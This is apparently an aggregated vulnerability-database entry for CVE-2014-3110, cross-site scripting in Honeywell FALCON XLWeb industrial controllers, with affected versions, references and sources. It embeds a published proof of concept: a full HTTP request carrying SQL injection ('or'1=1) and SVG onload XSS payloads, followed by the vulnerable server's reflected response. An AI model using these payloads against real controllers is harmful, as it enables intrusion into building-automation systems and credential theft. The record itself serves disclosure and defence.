ID
VAR-201407-0468
CVE
CVE-2014-3110
TITLE
Honeywell FALCON XLWeb Linux Controller and FALCON XLWeb XLWebExe Controller cross-site scripting vulnerability
Trust: 0.8
DESCRIPTION
Multiple cross-site scripting (XSS) vulnerabilities on Honeywell FALCON XLWeb Linux controller devices 2.04.01 and earlier and FALCON XLWeb XLWebExe controller devices 2.02.11 and earlier allow remote attackers to inject arbitrary web script or HTML via invalid input. Honeywell is a manufacturing company focused on automation control. An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. # Exploit Title: Honeywell XL Web Controller SQLi & XSS # Date: 2018-05-24 # Exploit Author: t4rkd3vilz # Vendor Homepage: https://www.honeywell.com # Version: WebVersion : XL1000C50 EXCEL WEB 52 I/O, XL1000C100 EXCEL WEB 104 I/O, XL1000C500 EXCEL WEB 300 I/O, XL1000C1000 EXCEL WEB 600 I/O, XL1000C50U EXCEL WEB 52 I/O UUKL, XL1000C100U EXCEL WEB 104 I/O UUKL, XL1000C500U EXCEL WEB 300 I/O UUKL, and XL1000C1000U EXCEL WEB 600 I/O UUKL. # Tested on: Linux # CVE: CVE-2014-3110 --------------- ---> Proof Of Concept <-------------------------- POST /standard/mainframe.php HTTP/1.1 Cache-Control: no-cache Referer: http://TargetIP/standard/mainframe.php Accept: text/xml,application/xml,application/xhtml+xml,text/ html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.16 Safari/537.36 Accept-Language: en-us,en;q=0.5 Cookie: Locale=1033 Accept-Encoding: gzip, deflate Content-Length: 222 Content-Type: application/x-www-form-urlencoded SessionID=&LocaleID='or'1=1&LoginSessionID=&LoginUserNameMD5="/><svg/ onload=prompt(/XSS/)> &LoginPasswordMD5=&LoginCommand=&LoginPassword=& rememberMeCheck=&LoginDevice=192.168.1.12&LoginUserName=Guest HTTP/1.1 200 OK Set-Cookie: rememberUser=deleted; expires=Wednesday, 24-May-17 08:54:02 GMT; path=/ Server: Apache/1.3.23 (Unix) PHP/4.4.9 X-Powered-By: PHP/4.4.9 Content-Type: text/html Transfer-Encoding: chunked Date: Thu, 24 May 2018 08:54:03 GMT <br /> <b>Warning</b>: xw_get_users() expects parameter 1 to be long, string given in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line <b>97</b><br /> <br /> <b>Warning</b>: xml_load_texts_file() expects parameter 2 to be long, string given in <b>/mnt/mtd6/xlweb/web/standard/include/elements.php</b> on line <b>247</b><br /> <html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"/> <meta http-equiv="expires" content="0"/> <link rel="stylesheet" href="include/honeywell.css"/> <title><br /> <b>Notice</b>: Undefined index: HeadTitle in <b>/mnt/mtd6/xlweb/web/ standard/login/loginpage.php</b> on line <b>300</b><br /> </title> <script language="JavaScript"> <!-- var NS4 = document.layers; // if the selected element has alarms, the element within the // drop Down-list should be styled red. // This is done for firefox which does not accept even the // usage of inline styles. function setOptionColor() { if(document.getElementById("LoginSelect") != null) { var selectionBox = document.getElementById("LoginSelect"); var selectedElement = selectionBox.selectedIndex; var selectedOption = selectionBox.options[selectedElement]; if(selectedOption.getAttribute("class") != null) { var className = selectedOption.getAttribute("class"); if(className == "red") { selectionBox.style.color = "#FF0000"; } } } } function onSessionChange (sSessionID, sLocaleID) { document.forms.main.elements["SessionID"].value = sSessionID; document.forms.main.elements["LocaleID"].value = sLocaleID; submitCommand ("ChangeSession"); } function onDeviceListChange () { submitCommand ("UpdateDeviceList"); } function onSessionCreated (sResult, sSessionID) { if (sResult != "4194561") { if (sResult == "196626") { alert ("<br /> *<b>Notice</b>: Undefined index: CreateSessionFailed in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line <b>346</b><br />* *\n" +* "\n" + "<br /> *<b>Notice</b>: Undefined index: TooManyUsers in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line <b>348</b><br />* *");* } else { alert ("<br /> *<b>Notice</b>: Undefined index: CreateSessionFailed in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line <b>352</b><br />* *\n" +* "\n" + "<br /> *<b>Notice</b>: Undefined index: OperationalProblem in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line <b>354</b><br />* *");* } return; } var sUserName = document.forms.main.elements["LoginUserName"].value; var sPassword = calcMD5 (document.forms.main.elements[ "LoginPassword"].value); sPassword = calcMD5 (sSessionID + sUserName + sPassword); sUserName = calcMD5 (sUserName); document.forms.main.elements["LoginSessionID"].value = sSessionID; document.forms.main.elements["LoginUserNameMD5"].value = sUserName; document.forms.main.elements["LoginPasswordMD5"].value = sPassword; submitCommand ("Login"); } function showHelp (sHelpID) { var lWidth = 360; var lHeight = 320; var lLeft = (screen.width - lWidth) / 2; var lTop = (screen.height - lHeight) / 2; openDependent (*"login/help.php?Locale="/><svg/onload=prompt(/XSS/)>* &ID=" + sHelpID, "Help", "width=" + lWidth + ",height=" + lHeight + ",left=" + lLeft + ",top=" + lTop + ",scrollbars=yes,resizable=yes"); } function submitCommand (sCommand) { //document.forms.main.elements["LoginPassword"].value = ""; document.forms.main.elements["LoginCommand"].value = sCommand; document.forms.main.submit (); } function checkEnter (event) { var lkeyCode = 0; if (NS4) { lkeyCode = event.which; } else { lkeyCode = event.keyCode; } if (lkeyCode == 13) { createSession (); } } function changeDevice () { var oOptions = document.forms.main.elements[" LoginDevice"].options; for (var lIndex = 0; lIndex < oOptions.length; lIndex++) { if (oOptions[lIndex].selected) { var sURL = "http://" + oOptions[lIndex].value; sURL += ":80"; sURL += "/standard/"; sURL += "default.php?Locale="/><svg/onload=prompt(/XSS/)> "; parent.parent.window.location.replace (sURL); return; } } } function createSession () { if (top.frames.updateframe && top.frames.updateframe.createSession) { top.frames.updateframe.createSession (); } else { var lLeft = screen.width; var lTop = screen.height; var oWindow = open ("login/session.php", "Session", "width=0,height=0,left=" + lLeft + ",top=" + lTop + ",dependent=yes,locationbar=no,menubar=no,status=no,scrollbars=no"); } } function onLoad () { if (top.frames.updateframe) { top.frames.updateframe.location.replace ("login/update.php"); } document.main.LoginUserName.focus (); } //--> </script> <script type="text/javascript" src="scripts/md5.js"></script> </head> <body onload="setOptionColor()" class="colored" onLoad="onLoad ();" style="background-image: url(images/bg_headline_dialog.gif); background-repeat:repeat-x;"> <form name="main" method="post" action="/standard/mainframe.php"> <input type="hidden" name="SessionID"/> <input type="hidden" name="LocaleID" value="'"--></ style></scRipt><scRipt>netsparker(0x0001AA)</scRipt>"/> <input type="hidden" name="rememberMeCheck" value=""/> <input type="hidden" name="LoginSessionID"/> <input type="hidden" name="LoginUserNameMD5"/> <input type="hidden" name="LoginPasswordMD5"/> <input type="hidden" name="LoginCommand"/> <!-- ******************************************************************* --> <!-- * Controller Name * --> <!-- ******************************************************************* --> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr><td bgcolor="#7F7F7F"><img alt="" src="images/blank.gif" width="1" height="1"/></td></tr> <tr><td bgcolor="#000000"><img alt="" src="images/blank.gif" width="1" height="1"/></td></tr> <tr> <td class="headline" height="16" nowrap=""> AUM0_MUSEO_LANA.XLWEB_MUSEO_LANA.<br /> <b>Notice</b>: Undefined index: Title in <b>/mnt/mtd6/xlweb/web/ standard/login/loginpage.php</b> on line <b>509</b><br /> </td> </tr> </table> <table width="100%" height="75%" border="0" cellpadding="0" cellspacing="0"> <tr> <td width="50%"> </td> <td> <table border="0" cellspacing="7" cellpadding="0"> <!-- ****************************** ************************************* --> <!-- * Custom image * --> <!-- ****************************** ************************************* --> <tr> <td> <table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"> <img alt="" src="login/loginlogo.gif" /> </td> </tr> <tr><td><img alt="" src="images/blank.gif" width="1" height="7"/></td></tr> </table> </td> </tr> <!-- ****************************** ************************************* --> <!-- * Login group * --> <!-- ****************************** ************************************* --> <tr> <td> <br /> <b>Notice</b>: Undefined index: Login in <b>/mnt/mtd6/xlweb/web/ standard/login/loginpage.php</b> on line <b>596</b><br /> <br /> <b>Notice</b>: Undefined index: AltTitle in <b>/mnt/mtd6/xlweb/web/ standard/login/loginpage.php</b> on line <b>597</b><br /> <table width="100%" border="0" cellspacing="0" cellpadding="0" bgcolor="#B8D7F0"> <tr> <td><img alt="" src="images/group_left_top.gif" width="5" height="5"/></td> <td><img alt="" src="images/blank.gif" width="1" height="5"/></td> <td align="right"><img alt="" src="images/group_right_top.gif" width="5" height="5"/></td> </tr> <tr> <td><img alt="" src="images/blank.gif" width="5" height="1"/></td> <td width="100%" valign="top"> <table width="100%" border="0" cellspacing="0" cellpadding="2"> <tr> <td colspan="2" class="groupheader" nowrap=""> <b></b> </td> <td align="right"> </td> </tr> <tr> <td> </td> <td width="100%"> <table border="0" cellpadding="1" cellspacing="1"> <tr> <td nowrap=""><br /> <b>Notice</b>: Undefined index: Controller in <b>/mnt/mtd6/xlweb/web/ standard/login/loginpage.php</b> on line <b>605</b><br /> : </td> <td> <select id="LoginSelect" class="loginSelect" name="LoginDevice" onchange="changeDevice ();" style="width:150px;"> <option selected="" value="192.168.1.12" class="red" style="color:#FF0000; background-color:#D8E8F8"> XLWEB_MUSEO_LANA </option> </select> </td> <td> </td> <td align="right"> <img alt="" name="LoginAlarm" src="footer/alarm_red_tr.gif"> </td> </tr> <tr> <td nowrap=""><br /> <b>Notice</b>: Undefined index: UserName in <b>/mnt/mtd6/xlweb/web/ standard/login/loginpage.php</b> on line <b>632</b><br /> : </td> <td> <select name="LoginUserName" style="width:150px;"> <br /> <b>Warning</b>: Invalid argument supplied for foreach() in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line <b>650</b><br /> </select> </td> </tr> <tr> <td nowrap=""><br /> <b>Notice</b>: Undefined index: Password in <b>/mnt/mtd6/xlweb/web/ standard/login/loginpage.php</b> on line <b>689</b><br /> : </td> <td> <!--<input type="password" class="text" name="LoginPassword" style="width:150px;" onKeyPress="checkEnter (event)"/>--> <input name="LoginPassword" type="password" onKeyDown="checkEnter (event)" size="25" class="ppinput" value=""/> </td> </tr> <tr> <td><br /> <b>Notice</b>: Undefined index: RememberMeCheckbox in <b>/mnt/mtd6/xlweb/web/standard/login/loginpage.php</b> on line <b>720</b><br /> </td> <td><input id="rememberMeCheck" name="rememberMeCheck" type="checkbox" /></td> </tr> <tr> <td><img alt="" src="images/blank.gif" width="90" height="2"/></td> <td><img alt="" src="images/blank.gif" width="1" height="2"/></td> </tr> </table> </td> <td> </td> </tr> </table> </td> <td><img alt="" src="images/blank.gif" width="5" height="1"/></td> </tr> <tr> <td><img alt="" src="images/group_left_bottom.gif" width="5" height="5"/></td> <td><img alt="" src="images/blank.gif" width="1" height="5"/></td> <td align="right"><img alt="" src="images/group_right_bottom.gif" width="5" height="5"/></td> </tr> </table> </td> </tr> <!-- ****************************** ************************************* --> <!-- * Button * --> <!-- ****************************** ************************************* --> <tr> <td> <table border="0" cellspacing="7" cellpadding="0"> <tr> <td> <br /> <b>Notice</b>: Undefined index: LoginButton in <b>/mnt/mtd6/xlweb/web/ standard/login/loginpage.php</b> on line <b>750</b><br /> <br /> <b>Notice</b>: Undefined index: AltTitle in <b>/mnt/mtd6/xlweb/web/ standard/login/loginpage.php</b> on line <b>751</b><br /> <table border="0" cellspacing="0" cellpadding="0" > <tr> <td><img alt="" src="images/buttonleft.gif" width="7" height="18"/></td> <td background="images/buttonmiddle.gif" nowrap=""><a class="button" href="JavaScript:createSession ();" title=""></a></td> <td><img alt="" src="images/buttonright.gif" width="7" height="18"/></td> </tr> </table> </td> </tr> </table> </td> </tr> </table> </td> <td width="50%"> </td> </tr> </table> </form> </body> </html>
Trust: 2.7
IOT TAXONOMY
| category: | ['ICS'] | sub_category: | - | Trust: 0.8 |
AFFECTED PRODUCTS
| vendor: | honeywell | model: | falcon xlweb xlwebexe | scope: | lte | version: | 2.02.11 | Trust: 1.0 |
| vendor: | honeywell | model: | falcon xlweb linux controller | scope: | lte | version: | 2.04.01 | Trust: 1.0 |
| vendor: | honeywell | model: | falcon linux | scope: | lte | version: | 2.04.01 | Trust: 0.8 |
| vendor: | honeywell | model: | falcon xlwebexe | scope: | lte | version: | 2.02.11 | Trust: 0.8 |
| vendor: | honeywell | model: | falcon xlweb controllers | scope: | lte | version: | <=2.02.11 | Trust: 0.6 |
| vendor: | honeywell | model: | falcon xlweb linux controller | scope: | eq | version: | 2.04.01 | Trust: 0.6 |
| vendor: | honeywell | model: | falcon xlweb xlwebexe | scope: | eq | version: | 2.02.11 | Trust: 0.6 |
| vendor: | honeywell | model: | falcon xlwebexe | scope: | eq | version: | 2.2.11 | Trust: 0.3 |
| vendor: | honeywell | model: | falcon linux | scope: | eq | version: | 2.4.1 | Trust: 0.3 |
| vendor: | falcon xlweb linux controller | model: | - | scope: | eq | version: | * | Trust: 0.2 |
| vendor: | falcon xlweb xlwebexe | model: | - | scope: | eq | version: | * | Trust: 0.2 |
CVSS
SEVERITY | CVSSV2 | CVSSV3 | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
PROBLEMTYPE DATA
| problemtype: | CWE-79 | Trust: 1.8 |
THREAT TYPE
remote
Trust: 0.7
TYPE
XSS
Trust: 0.6
CONFIGURATIONS
PATCH
| title: | Top Page | url: | http://honeywell.com/Pages/Home.aspx | Trust: 0.8 |
| title: | トップページ | url: | http://honeywell.com/sites/jp/Pages/home.aspx | Trust: 0.8 |
| title: | Honeywell FALCON XLWeb Controllers has multiple patches for cross-site scripting vulnerabilities | url: | https://www.cnvd.org.cn/patchInfo/show/47879 | Trust: 0.6 |
EXTERNAL IDS
| db: | NVD | id: | CVE-2014-3110 | Trust: 3.6 |
| db: | ICS CERT | id: | ICSA-14-175-01 | Trust: 3.3 |
| db: | BID | id: | 68838 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 44749 | Trust: 1.0 |
| db: | CNVD | id: | CNVD-2014-04588 | Trust: 0.8 |
| db: | CNNVD | id: | CNNVD-201407-600 | Trust: 0.8 |
| db: | JVNDB | id: | JVNDB-2014-003564 | Trust: 0.8 |
| db: | IVD | id: | E2F7D638-2351-11E6-ABEF-000C29C66E3D | Trust: 0.2 |
| db: | PACKETSTORM | id: | 147863 | Trust: 0.1 |
REFERENCES
| url: | http://ics-cert.us-cert.gov/advisories/icsa-14-175-01 | Trust: 3.3 |
| url: | http://www.securityfocus.com/bid/68838 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/44749/ | Trust: 1.0 |
| url: | http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-3110 | Trust: 0.8 |
| url: | http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-3110 | Trust: 0.8 |
| url: | http://www.security.honeywell.com/ | Trust: 0.3 |
| url: | https://nvd.nist.gov/vuln/detail/cve-2014-3110 | Trust: 0.1 |
| url: | https://www.honeywell.com | Trust: 0.1 |
| url: | http://targetip/standard/mainframe.php | Trust: 0.1 |
| url: | http://" | Trust: 0.1 |
CREDITS
Juan Francisco Bolivar
Trust: 0.3
SOURCES
| db: | IVD | id: | e2f7d638-2351-11e6-abef-000c29c66e3d |
| db: | CNVD | id: | CNVD-2014-04588 |
| db: | BID | id: | 68838 |
| db: | JVNDB | id: | JVNDB-2014-003564 |
| db: | PACKETSTORM | id: | 147863 |
| db: | CNNVD | id: | CNNVD-201407-600 |
| db: | NVD | id: | CVE-2014-3110 |
LAST UPDATE DATE
2025-04-13T23:03:16.589000+00:00
SOURCES UPDATE DATE
| db: | CNVD | id: | CNVD-2014-04588 | date: | 2014-07-25T00:00:00 |
| db: | BID | id: | 68838 | date: | 2014-07-22T00:00:00 |
| db: | JVNDB | id: | JVNDB-2014-003564 | date: | 2014-07-28T00:00:00 |
| db: | CNNVD | id: | CNNVD-201407-600 | date: | 2014-07-25T00:00:00 |
| db: | NVD | id: | CVE-2014-3110 | date: | 2025-04-12T10:46:40.837 |
SOURCES RELEASE DATE
| db: | IVD | id: | e2f7d638-2351-11e6-abef-000c29c66e3d | date: | 2014-07-25T00:00:00 |
| db: | CNVD | id: | CNVD-2014-04588 | date: | 2014-07-25T00:00:00 |
| db: | BID | id: | 68838 | date: | 2014-07-22T00:00:00 |
| db: | JVNDB | id: | JVNDB-2014-003564 | date: | 2014-07-28T00:00:00 |
| db: | PACKETSTORM | id: | 147863 | date: | 2018-05-24T18:24:01 |
| db: | CNNVD | id: | CNNVD-201407-600 | date: | 2014-07-25T00:00:00 |
| db: | NVD | id: | CVE-2014-3110 | date: | 2014-07-24T14:55:07.487 |